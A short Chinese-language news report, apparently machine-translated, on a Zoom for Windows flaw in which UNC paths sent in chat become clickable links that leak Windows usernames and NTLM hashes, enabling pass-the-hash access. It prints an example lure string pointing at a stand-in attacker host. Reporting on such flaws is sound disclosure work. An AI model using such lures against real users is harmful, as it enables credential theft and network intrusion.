研究人员说，为Windows系统安装Zoom软件的用户要小心:这个被广泛使用的软件有一个漏洞，可以让攻击者窃取你的操作系统证书。
 

在发现目前未修补的漏洞的同时，Zoom的使用也随着冠状病毒的流行而激增。由于有大量的人在家工作，他们依靠Zoom与同事、客户和合作伙伴建立联系。

这些家庭用户中的许多人通过临时或临时的方式连接到敏感的工作网络，而这些方式无法获得企业级别的防火墙。
 

攻击的工作原理是使用Zoom聊天窗口向目标发送一串文本，这些文本代表了他们正在使用的Windows设备上的网络位置。

用于Windows的缩放应用程序会自动将这些所谓的通用命名约定字符串(如\\attack . example.com/c $)转换为可单击链接。如果目标单击网络上未完全锁定的链接，Zoom将把Windows用户名和相应的NTLM散列发送到链接中包含的地址。
 

然后攻击者可以使用这些凭证访问共享的网络资源，比如Outlook服务器和存储设备。通常，在对设备进行身份验证时，Windows网络上的资源将接受NTLM散列。

这使得网络容易受到所谓的“传递哈希”攻击，这种攻击不需要破解技术就可以将哈希转换为相应的明文密码。

“这是Zoom的一个相当大的缺点，”安全精品黑客之家(Hacker House)的联合创始人马修·希基(Matthew Hickey)告诉我。“这是一个非常小的错误。现在越来越多的人在家工作，利用这个漏洞就更容易了。”